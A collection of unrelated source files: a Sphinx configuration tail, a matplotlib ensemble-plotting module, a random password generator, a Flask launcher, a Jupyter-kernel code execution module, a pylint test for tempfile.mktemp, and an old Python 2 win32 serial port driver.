(master_doc, 'dawn.tex', 'Dawn Documentation',
'Fabian Thuering, Carlos Osuna and Tobias Wicky\\\\~\\\\ETH Zurich and MeteoSwiss', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
# latex_logo = 'pybind11-logo.png'
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for edit_on_github ----------------------------------------------
edit_on_github_project = 'thfabian/dawn'
edit_on_github_branch = 'master'
|
py | 7dfa21a42c4962e01991bccd72d89315398a82d5 | """Plot the chosen field for each ensemble."""
import math
import os
import matplotlib.pyplot as plt
import numpy as np
import cartopy.crs as ccrs
# User-defined libraries
from read_netcdf import read_n_2d_fields
def ens_plots(dir_output, dir_plot, name_outputs, numclus,
field_to_plot, plot_type):
"""Plot the chosen field for each ensemble."""
print('Number of clusters: {0}'.format(numclus))
varname = name_outputs.split("_")[0]
kind = name_outputs.split("_")[-2]
exp = name_outputs.split("_")[-1]
    # Reading the netCDF file of N 2D fields of anomalies, saved by ens_anom.py
namef = os.path.join(dir_output, 'ens_anomalies_{0}.nc'
.format(name_outputs))
vartoplot, varunits, lat, lon = read_n_2d_fields(namef)
print('vartoplot dim: (numens x lat x lon)={0}'.format(vartoplot.shape))
numens = vartoplot.shape[0]
# ____________Load labels
namef = os.path.join(dir_output, 'labels_{0}.txt'.format(name_outputs))
labels = np.loadtxt(namef, dtype=int)
vmi = round_down(np.nanpercentile(vartoplot, 0.1))
vma = round_up(np.nanpercentile(vartoplot, 99.9))
if field_to_plot == 'anomalies':
# compute range colorbar for anomalies
if abs(vmi) < abs(vma):
rangecbarmin = -abs(vma)
rangecbarmax = abs(vma)
else:
rangecbarmin = -abs(vmi)
rangecbarmax = abs(vmi)
else:
# compute range colorbar for climatologies
rangecbarmin = vmi
rangecbarmax = vma
delta = round_down((rangecbarmax - rangecbarmin) / 100)
clevels = np.arange(rangecbarmin, rangecbarmax + delta, delta)
colors = ['b', 'g', 'r', 'c', 'm', 'y', 'DarkOrange', 'grey']
proj = ccrs.PlateCarree()
xpos = int(np.ceil(np.sqrt(numens * 1.6)))
ypos = int(np.ceil(numens / xpos))
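    # e.g. (illustrative) numens = 10 -> xpos = ceil(sqrt(16)) = 4, ypos = ceil(10 / 4) = 3, i.e. a 4 x 3 grid of panels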
fig = plt.figure(figsize=(24, 14))
if min(lon) < 180. < max(lon):
clon = 180.
else:
clon = 0.
for nens in range(numens):
axes = plt.subplot(xpos, ypos, nens + 1,
projection=ccrs.PlateCarree(central_longitude=clon))
axes.set_extent([min(lon), max(lon), min(lat), max(lat)],
crs=ccrs.PlateCarree())
axes.coastlines("110m")
# Plot Data
if field_to_plot == 'anomalies':
map_plot = plt.contourf(lon, lat, vartoplot[nens], clevels,
cmap=plt.cm.RdBu_r,
transform=proj, extend='both')
else:
map_plot = plt.contourf(lon, lat, vartoplot[nens], clevels,
transform=proj, extend='both')
# Add Title
title_obj = plt.title(nens, fontsize=32, fontweight='bold')
for nclus in range(numclus):
if nens in np.where(labels == nclus)[0]:
title_obj.set_backgroundcolor(colors[nclus])
cax = plt.axes([0.1, 0.03, 0.8, 0.03]) # horizontal
cbar = plt.colorbar(map_plot, cax=cax, orientation='horizontal')
cbar.ax.tick_params(labelsize=18)
cbar.set_ticks(np.arange(rangecbarmin, rangecbarmax + delta, delta * 20))
plt.suptitle(exp + ' ' + kind + ' ' + varname + ' ' + field_to_plot +
' (' + varunits + ')', fontsize=45, fontweight='bold')
top = 0.89 # the top of the subplots of the figure
bottom = 0.12 # the bottom of the subplots of the figure
left = 0.02 # the left side of the subplots of the figure
right = 0.98 # the right side of the subplots of the figure
hspace = 0.36 # amount of height reserved for white space between subplots
wspace = 0.14 # amount of width reserved for blank space between subplots
plt.subplots_adjust(left=left, bottom=bottom, right=right, top=top,
wspace=wspace, hspace=hspace)
# plot the selected fields
namef = os.path.join(dir_plot, ('{0}_{1}.' + plot_type)
.format(field_to_plot, name_outputs))
fig.savefig(namef) # bbox_inches='tight')
    print('A {0} figure for the selected fields was saved in {1}'
          .format(plot_type, dir_plot))
return namef
def round_up(x, sig=2):
"""Round up to a given number of significant digits."""
dig = pow(10., sig - int(math.floor(math.log10(abs(x)))) - 1)
return math.ceil(x * dig) / dig
def round_down(x, sig=2):
"""Round down to a given number of significant digits."""
dig = pow(10., sig - int(math.floor(math.log10(abs(x)))) - 1)
return math.floor(x * dig) / dig
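# Illustrative examples (not part of the original module), using the default sig=2:
#   round_up(0.1234)   -> 0.13
#   round_down(0.1234) -> 0.12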
|
py | 7dfa21d52d39354a8caad714a833a72763c2457c | '''
Created on 2017-08-16
Random password generator
@author: liliangang
'''
import random
class RandomPassword:
def __init__(self, length=8):
self.factor = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ~!@#$%^&*()_+=-'
self.length = length
def next(self, length=0):
length = length if length > 0 else self.length
array = []
for i in range(length) :
array.append(self.factor[random.randint(0, len(self.factor) - 1)])
return ''.join(array)
if __name__ == '__main__':
for i in range(10) :
print(RandomPassword().next());
|
py | 7dfa2283428e850dbca123dade2a0b8421febba4 | import settings
from app import app
app.run(host='0.0.0.0', debug=settings.DEBUG)
|
py | 7dfa22a5a2de29471f24eabbf8507f3f217d334e | # -*- coding: utf-8 -*-
#
# Copyright (c) 2021-2022, Geoffrey M. Poore
# All rights reserved.
#
# Licensed under the BSD 3-Clause License:
# http://opensource.org/licenses/BSD-3-Clause
#
from __future__ import annotations
import base64
import queue
import re
import time
import pathlib
try:
import jupyter_client
except ImportError:
jupyter_client = None
from .. import util
from .. import message
from ..code_collections import Session
from ..progress import Progress
_ansi_color_escape_code_re = re.compile('\x1b.*?m')
kernel_name_aliases: dict[str, str] = {}
if jupyter_client is not None:
duplicates = set()
for k, v in jupyter_client.kernelspec.KernelSpecManager().get_all_specs().items():
for alias in [k.lower(), v['spec']['display_name'].lower(), v['spec']['language'].lower()]:
if alias in kernel_name_aliases:
duplicates.add(alias)
else:
kernel_name_aliases[alias] = k
for k in duplicates:
del kernel_name_aliases[k]
del duplicates
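# Illustrative (hypothetical) lookup -- the actual mapping depends on the locally
# installed kernelspecs; with a standard IPython kernel present, 'python',
# 'python 3' and 'python3' would all resolve to the same kernelspec name:
#   kernel_name_aliases.get('python')  # -> 'python3' (if that kernel is installed)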
mime_type_to_file_extension_map: dict[str, str] = {
'image/png': 'png',
'image/jpeg': 'jpg',
'image/svg+xml': 'svg',
'application/pdf': 'pdf',
}
_home_path_re_pattern = re.escape(pathlib.Path('~').expanduser().as_posix()).replace('/', r'[\\/]')
_home_path_re = re.compile(_home_path_re_pattern, re.IGNORECASE)
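# Illustrative effect (machine dependent): with a home directory of /home/alice,
#   _home_path_re.sub('~', '/home/alice/project/run.py')  ->  '~/project/run.py'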
async def exec(session: Session, *, cache_key_path: pathlib.Path, progress: Progress) -> None:
'''
Execute code from a session with a Jupyter kernel, attach textual output
to the code chunks within the session, and save rich output files.
'''
# https://jupyter-client.readthedocs.io/en/stable/api/client.html
# https://jupyter-client.readthedocs.io/en/stable/messaging.html#messages-on-the-iopub-pub-sub-channel
session.did_exec = True
progress.session_exec_stage_start(session, stage='run')
if jupyter_client is None:
msg = 'Cannot import "jupyter_client" Python module; install it and try again'
session.errors.append(message.SysConfigError(msg))
progress.session_exec_stage_end(session, stage='run')
progress.session_finished(session)
return
if jupyter_client.version_info < (6, 1):
# Require async support
msg = f'jupyter_client >= 6.1.0 is required; version {jupyter_client.__version__} is installed'
session.errors.append(message.SysConfigError(msg))
progress.session_exec_stage_end(session, stage='run')
progress.session_finished(session)
return
kernel_name = kernel_name_aliases.get(session.jupyter_kernel.lower())
if kernel_name is None:
msg = f'No Jupyter kernel was found for "{session.jupyter_kernel}"'
session.errors.append(message.SysConfigError(msg))
progress.session_exec_stage_end(session, stage='run')
progress.session_finished(session)
return
kernel_manager = jupyter_client.AsyncKernelManager(kernel_name=kernel_name)
try:
await kernel_manager.start_kernel()
except jupyter_client.kernelspec.NoSuchKernel:
msg = f'No Jupyter kernel was found for "{session.jupyter_kernel}"'
session.errors.append(message.SysConfigError(msg))
progress.session_exec_stage_end(session, stage='run')
progress.session_finished(session)
return
except FileNotFoundError:
msg = f'Jupyter kernel for "{session.jupyter_kernel}" has been deleted or corrupted'
session.errors.append(message.SysConfigError(msg))
progress.session_exec_stage_end(session, stage='run')
progress.session_finished(session)
return
except Exception as e:
msg = f'Failed to start Jupyter kernel for "{session.jupyter_kernel}":\n{e}'
session.errors.append(message.SysConfigError(msg))
progress.session_exec_stage_end(session, stage='run')
progress.session_finished(session)
return
kernel_client = kernel_manager.client()
kernel_client.start_channels()
try:
await kernel_client.wait_for_ready()
except RuntimeError as e:
kernel_client.stop_channels()
await kernel_manager.shutdown_kernel()
msg = f'Jupyter kernel timed out during setup:\n{e}'
session.errors.append(message.RunConfigError(msg))
progress.session_exec_stage_end(session, stage='run')
progress.session_finished(session)
return
try:
kernel_has_errors = False
incomplete_cc_stack = []
for cc in session.code_chunks:
if kernel_has_errors:
break
if cc.output_index != cc.index:
# If incomplete code, accumulate until complete
incomplete_cc_stack.append(cc)
continue
if not incomplete_cc_stack:
progress.chunk_start(session, chunk=cc)
cc_jupyter_id = kernel_client.execute(cc.code)
else:
incomplete_cc_stack.append(cc)
progress.chunk_start(session, chunk=incomplete_cc_stack[0])
cc_jupyter_id = kernel_client.execute('\n'.join(icc.code for icc in incomplete_cc_stack))
deadline = time.monotonic() + session.jupyter_timeout
while True:
try:
kernel_msg = await kernel_client.get_iopub_msg(timeout=max(0, deadline - time.monotonic()))
except queue.Empty:
kernel_msg = (f'Jupyter kernel "{kernel_name}" timed out during execution '
f'(jupyter_timeout = {session.jupyter_timeout} s)')
cc.errors.append(message.RunConfigError(kernel_msg))
kernel_has_errors = True
break
if kernel_msg['parent_header'].get('msg_id') != cc_jupyter_id:
continue
kernel_msg_type = kernel_msg['msg_type']
kernel_msg_content = kernel_msg['content']
if kernel_msg_type == 'status' and kernel_msg_content['execution_state'] == 'idle':
break
if kernel_msg_type in ('display_data', 'execute_result'):
# Rich output
if cc.rich_output is None:
cc.rich_output = []
rich_output_files = {}
rich_output = {'files': rich_output_files, 'data': kernel_msg_content['data']}
for mime_type, data in kernel_msg_content['data'].items():
file_extension = mime_type_to_file_extension_map.get(mime_type)
if file_extension is None:
continue
if 'name' not in cc.options:
file_name = f'''{kernel_name}-{session.name or ''}-{cc.output_index+1:03d}-{len(cc.rich_output)+1:02d}.{file_extension}'''
else:
file_name = f'''{cc.options['name']}-{len(cc.rich_output)+1}.{file_extension}'''
session.files.append(file_name)
ro_path = cache_key_path / file_name
ro_path.write_bytes(base64.b64decode(data))
rich_output_files[mime_type] = ro_path.as_posix()
cc.rich_output.append(rich_output)
rich_output_text = kernel_msg_content['data'].get('text/plain')
if rich_output_text:
progress.chunk_rich_output_text(session, chunk=cc, output=rich_output_text)
if rich_output_files:
progress.chunk_rich_output_files(session, chunk=cc, files=rich_output_files.values())
elif kernel_msg_type == 'stream':
if kernel_msg_content['name'] == 'stdout':
cc.stdout_lines.extend(util.splitlines_lf(kernel_msg_content['text']))
progress.chunk_stdout(session, chunk=cc, output=kernel_msg_content['text'])
elif kernel_msg_content['name'] == 'stderr':
cc.stderr_lines.extend(util.splitlines_lf(_home_path_re.sub('~', kernel_msg_content['text'])))
progress.chunk_stderr(session, chunk=cc, output=kernel_msg_content['text'])
elif kernel_msg_type == 'error':
kernel_msg_text = _ansi_color_escape_code_re.sub('', '\n'.join(kernel_msg_content['traceback']))
kernel_msg_text = _home_path_re.sub('~', kernel_msg_text)
# This is currently treated as a `StderrRunError` and
# stored in `stderr_lines`. For some kernels, it may
# make more sense to use `RunError` or further refine the
# error system.
cc.stderr_lines.extend(util.splitlines_lf(kernel_msg_text))
cc.errors.append(message.StderrRunError(cc.stderr_lines))
kernel_has_errors = True
progress.chunk_stderr(session, chunk=cc, output=kernel_msg_text)
if not incomplete_cc_stack:
progress.chunk_end(session, chunk=cc)
else:
# `progress` only takes first chunk but accounts for all
# chunks that are grouped together
progress.chunk_end(session, chunk=incomplete_cc_stack[0])
incomplete_cc_stack = []
finally:
kernel_client.stop_channels()
await kernel_manager.shutdown_kernel()
progress.session_exec_stage_end(session, stage='run')
progress.session_finished(session)
|
py | 7dfa2463457374242dd37af4a377e32964209567 | # -*- coding: utf-8 -*-
# Copyright 2021 Damien Nguyen
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import astroid
import pylint.testutils
import pytest
import pylint_secure_coding_standard as pylint_scs
try:
from pylint.testutils import MessageTest
except ImportError:
from pylint.testutils import Message as MessageTest
class TestSecureCodingStandardChecker(pylint.testutils.CheckerTestCase):
CHECKER_CLASS = pylint_scs.SecureCodingStandardChecker
def test_tempfile_mktemp_ok(self):
import_node1, import_node2, call_node1 = astroid.extract_node(
"""
import tempfile #@
import tempfile as temp #@
tempfile.mkstemp() #@
"""
)
with self.assertNoMessages():
self.checker.visit_import(import_node1)
self.checker.visit_import(import_node2)
self.checker.visit_call(call_node1)
@pytest.mark.parametrize(
's',
('from tempfile import mktemp',),
)
def test_tempfile_mktemp_importfrom(self, s):
node = astroid.extract_node(s + ' #@')
with self.assertAddsMessages(MessageTest(msg_id='replace-mktemp', node=node)):
self.checker.visit_importfrom(node)
@pytest.mark.parametrize(
's',
(
'mktemp()',
'tempfile.mktemp()',
),
)
def test_tempfile_mktemp_call(self, s):
node = astroid.extract_node(s + ' #@')
with self.assertAddsMessages(MessageTest(msg_id='replace-mktemp', node=node)):
self.checker.visit_call(node)
|
py | 7dfa260dc508867dc9837368eef1016186ac36a9 | #! python
#Python Serial Port Extension for Win32, Linux, BSD, Jython
#serial driver for win32
#see __init__.py
#
#(C) 2001-2003 Chris Liechti <[email protected]>
# this is distributed under a free software license, see license.txt
import win32file # The base COM port and file IO functions.
import win32event # We use events and the WaitFor[Single|Multiple]Objects functions.
import win32con # constants.
from serialutil import *
VERSION = "$Revision$".split()[1] #extract CVS version
#from winbase.h. these should really be in win32con
MS_CTS_ON = 16
MS_DSR_ON = 32
MS_RING_ON = 64
MS_RLSD_ON = 128
def device(portnum):
"""Turn a port number into a device name"""
#the "//./COMx" format is required for devices >= 9
#not all versions of windows seem to support this propperly
#so that the first few ports are used with the DOS device name
if portnum < 9:
return 'COM%d' % (portnum+1) #numbers are transformed to a string
else:
return r'\\.\COM%d' % (portnum+1)
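# Illustrative examples: device(0) -> 'COM1', device(8) -> 'COM9', device(9) -> r'\\.\COM10'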
class Serial(SerialBase):
"""Serial port implemenation for Win32. This implemenatation requires a
win32all installation."""
BAUDRATES = (50,75,110,134,150,200,300,600,1200,1800,2400,4800,9600,
19200,38400,57600,115200)
def open(self):
"""Open port with current settings. This may throw a SerialException
if the port cannot be opened."""
if self._port is None:
raise SerialException("Port must be configured before it can be used.")
self.hComPort = None
try:
self.hComPort = win32file.CreateFile(self.portstr,
win32con.GENERIC_READ | win32con.GENERIC_WRITE,
0, # exclusive access
None, # no security
win32con.OPEN_EXISTING,
win32con.FILE_ATTRIBUTE_NORMAL | win32con.FILE_FLAG_OVERLAPPED,
None)
except Exception, msg:
            self.hComPort = None    # because __del__ is called anyway
raise SerialException("could not open port: %s" % msg)
# Setup a 4k buffer
win32file.SetupComm(self.hComPort, 4096, 4096)
#Save original timeout values:
self._orgTimeouts = win32file.GetCommTimeouts(self.hComPort)
self._rtsState = win32file.RTS_CONTROL_ENABLE
self._dtrState = win32file.RTS_CONTROL_ENABLE
self._reconfigurePort()
# Clear buffers:
# Remove anything that was there
win32file.PurgeComm(self.hComPort,
win32file.PURGE_TXCLEAR | win32file.PURGE_TXABORT |
win32file.PURGE_RXCLEAR | win32file.PURGE_RXABORT)
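        # Descriptive note: two OVERLAPPED structures drive the asynchronous I/O.
        # The read event is created manual-reset (read() clears it explicitly via
        # ResetEvent); the write event is created auto-reset.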
self._overlappedRead = win32file.OVERLAPPED()
self._overlappedRead.hEvent = win32event.CreateEvent(None, 1, 0, None)
self._overlappedWrite = win32file.OVERLAPPED()
#~ self._overlappedWrite.hEvent = win32event.CreateEvent(None, 1, 0, None)
self._overlappedWrite.hEvent = win32event.CreateEvent(None, 0, 0, None)
self._isOpen = True
def _reconfigurePort(self):
"""Set commuication parameters on opened port."""
if not self.hComPort:
raise SerialException("Can only operate on a valid port handle")
#Set Windows timeout values
#timeouts is a tuple with the following items:
#(ReadIntervalTimeout,ReadTotalTimeoutMultiplier,
# ReadTotalTimeoutConstant,WriteTotalTimeoutMultiplier,
# WriteTotalTimeoutConstant)
if self._timeout is None:
timeouts = (0, 0, 0, 0, 0)
elif self._timeout == 0:
timeouts = (win32con.MAXDWORD, 0, 0, 0, 0)
else:
timeouts = (0, 0, int(self._timeout*1000), 0, 0)
if self._writeTimeout is None:
pass
elif self._writeTimeout == 0:
timeouts = timeouts[:-2] + (0, win32con.MAXDWORD)
else:
timeouts = timeouts[:-2] + (0, int(self._writeTimeout*1000))
win32file.SetCommTimeouts(self.hComPort, timeouts)
win32file.SetCommMask(self.hComPort, win32file.EV_ERR)
# Setup the connection info.
# Get state and modify it:
comDCB = win32file.GetCommState(self.hComPort)
comDCB.BaudRate = self._baudrate
if self._bytesize == FIVEBITS:
comDCB.ByteSize = 5
elif self._bytesize == SIXBITS:
comDCB.ByteSize = 6
elif self._bytesize == SEVENBITS:
comDCB.ByteSize = 7
elif self._bytesize == EIGHTBITS:
comDCB.ByteSize = 8
else:
raise ValueError("Unsupported number of data bits: %r" % self._bytesize)
if self._parity == PARITY_NONE:
comDCB.Parity = win32file.NOPARITY
comDCB.fParity = 0 # Dis/Enable Parity Check
elif self._parity == PARITY_EVEN:
comDCB.Parity = win32file.EVENPARITY
comDCB.fParity = 1 # Dis/Enable Parity Check
elif self._parity == PARITY_ODD:
comDCB.Parity = win32file.ODDPARITY
comDCB.fParity = 1 # Dis/Enable Parity Check
else:
raise ValueError("Unsupported parity mode: %r" % self._parity)
if self._stopbits == STOPBITS_ONE:
comDCB.StopBits = win32file.ONESTOPBIT
elif self._stopbits == STOPBITS_TWO:
comDCB.StopBits = win32file.TWOSTOPBITS
else:
raise ValueError("Unsupported number of stop bits: %r" % self._stopbits)
comDCB.fBinary = 1 # Enable Binary Transmission
        # Characters with parity errors are replaced with 0xff (if fErrorChar is set to TRUE)
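        # Descriptive note: with rtscts/dsrdtr handshaking enabled the driver
        # toggles RTS/DTR automatically; otherwise the lines keep the state last
        # requested through setRTS()/setDTR() (cached in _rtsState/_dtrState).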
if self._rtscts:
comDCB.fRtsControl = win32file.RTS_CONTROL_HANDSHAKE
else:
comDCB.fRtsControl = self._rtsState
if self._dsrdtr:
comDCB.fDtrControl = win32file.DTR_CONTROL_HANDSHAKE
else:
comDCB.fDtrControl = self._dtrState
comDCB.fOutxCtsFlow = self._rtscts
comDCB.fOutxDsrFlow = self._dsrdtr
comDCB.fOutX = self._xonxoff
comDCB.fInX = self._xonxoff
comDCB.fNull = 0
comDCB.fErrorChar = 0
comDCB.fAbortOnError = 0
comDCB.XonChar = XON
comDCB.XoffChar = XOFF
try:
win32file.SetCommState(self.hComPort, comDCB)
except win32file.error, e:
raise ValueError("Cannot configure port, some setting was wrong. Original message: %s" % e)
#~ def __del__(self):
#~ self.close()
def close(self):
"""Close port"""
if self._isOpen:
if self.hComPort:
#Restore original timeout values:
win32file.SetCommTimeouts(self.hComPort, self._orgTimeouts)
#Close COM-Port:
win32file.CloseHandle(self.hComPort)
self.hComPort = None
self._isOpen = False
def makeDeviceName(self, port):
return device(port)
# - - - - - - - - - - - - - - - - - - - - - - - -
def inWaiting(self):
"""Return the number of characters currently in the input buffer."""
flags, comstat = win32file.ClearCommError(self.hComPort)
return comstat.cbInQue
def read(self, size=1):
"""Read size bytes from the serial port. If a timeout is set it may
return less characters as requested. With no timeout it will block
until the requested number of bytes is read."""
if not self.hComPort: raise portNotOpenError
if size > 0:
win32event.ResetEvent(self._overlappedRead.hEvent)
flags, comstat = win32file.ClearCommError(self.hComPort)
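            # Descriptive note: timeout == 0 is the non-blocking case and reads
            # only what is already queued (cbInQue); otherwise one overlapped read
            # for the full size is issued and the comm timeouts configured in
            # _reconfigurePort() determine how long it may wait.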
if self.timeout == 0:
n = min(comstat.cbInQue, size)
if n > 0:
rc, buf = win32file.ReadFile(self.hComPort, win32file.AllocateReadBuffer(n), self._overlappedRead)
win32event.WaitForSingleObject(self._overlappedRead.hEvent, win32event.INFINITE)
read = str(buf)
else:
read = ''
else:
rc, buf = win32file.ReadFile(self.hComPort, win32file.AllocateReadBuffer(size), self._overlappedRead)
n = win32file.GetOverlappedResult(self.hComPort, self._overlappedRead, 1)
read = str(buf[:n])
else:
read = ''
return read
def write(self, s):
"""Output the given string over the serial port."""
if not self.hComPort: raise portNotOpenError
#print repr(s),
if s:
#~ win32event.ResetEvent(self._overlappedWrite.hEvent)
err, n = win32file.WriteFile(self.hComPort, s, self._overlappedWrite)
            if err: # for an overlapped write err will typically be ERROR_IO_PENDING
# Wait for the write to complete.
#~ win32event.WaitForSingleObject(self._overlappedWrite.hEvent, win32event.INFINITE)
n = win32file.GetOverlappedResult(self.hComPort, self._overlappedWrite, 1)
if n != len(s):
raise writeTimeoutError
def flushInput(self):
"""Clear input buffer, discarding all that is in the buffer."""
if not self.hComPort: raise portNotOpenError
win32file.PurgeComm(self.hComPort, win32file.PURGE_RXCLEAR | win32file.PURGE_RXABORT)
def flushOutput(self):
"""Clear output buffer, aborting the current output and
discarding all that is in the buffer."""
if not self.hComPort: raise portNotOpenError
win32file.PurgeComm(self.hComPort, win32file.PURGE_TXCLEAR | win32file.PURGE_TXABORT)
def sendBreak(self):
"""Send break condition."""
if not self.hComPort: raise portNotOpenError
import time
win32file.SetCommBreak(self.hComPort)
#TODO: how to set the correct duration??
time.sleep(0.020)
win32file.ClearCommBreak(self.hComPort)
def setRTS(self,level=1):
"""Set terminal status line: Request To Send"""
if not self.hComPort: raise portNotOpenError
if level:
self._rtsState = win32file.RTS_CONTROL_ENABLE
win32file.EscapeCommFunction(self.hComPort, win32file.SETRTS)
else:
self._rtsState = win32file.RTS_CONTROL_DISABLE
win32file.EscapeCommFunction(self.hComPort, win32file.CLRRTS)
def setDTR(self,level=1):
"""Set terminal status line: Data Terminal Ready"""
if not self.hComPort: raise portNotOpenError
if level:
self._dtrState = win32file.DTR_CONTROL_ENABLE
win32file.EscapeCommFunction(self.hComPort, win32file.SETDTR)
else:
self._dtrState = win32file.DTR_CONTROL_DISABLE
win32file.EscapeCommFunction(self.hComPort, win32file.CLRDTR)
def getCTS(self):
"""Read terminal status line: Clear To Send"""
if not self.hComPort: raise portNotOpenError
return MS_CTS_ON & win32file.GetCommModemStatus(self.hComPort) != 0
def getDSR(self):
"""Read terminal status line: Data Set Ready"""
if not self.hComPort: raise portNotOpenError
return MS_DSR_ON & win32file.GetCommModemStatus(self.hComPort) != 0
def getRI(self):
"""Read terminal status line: Ring Indicator"""
if not self.hComPort: raise portNotOpenError
return MS_RING_ON & win32file.GetCommModemStatus(self.hComPort) != 0
def getCD(self):
"""Read terminal status line: Carrier Detect"""
if not self.hComPort: raise portNotOpenError
return MS_RLSD_ON & win32file.GetCommModemStatus(self.hComPort) != 0
# - - platform specific - - - -
def setXON(self, level=True):
"""Platform specific - set flow state."""
if not self.hComPort: raise portNotOpenError
if level:
win32file.EscapeCommFunction(self.hComPort, win32file.SETXON)
else:
win32file.EscapeCommFunction(self.hComPort, win32file.SETXOFF)
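# Hedged usage sketch, not part of the original driver: exercising the timeout
# behaviour documented in read(). It assumes the SerialBase constructor of this
# pyserial vintage accepts the baudrate and timeout keywords and that a device
# is attached to the chosen port; port number and sizes are illustrative only.
def _example_timed_read(portnum=0):
    s = Serial(portnum, baudrate=9600, timeout=1.0)  # read() waits at most ~1 second
    try:
        data = s.read(16)  # may return fewer than 16 bytes if the timeout expires
    finally:
        s.close()
    return data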
#Test function only!!
if __name__ == '__main__':
print __name__
s = Serial()
print s
s = Serial(0)
print s
s.baudrate = 19200
s.databits = 7
s.close()
s.port = 3
s.open()
print s
|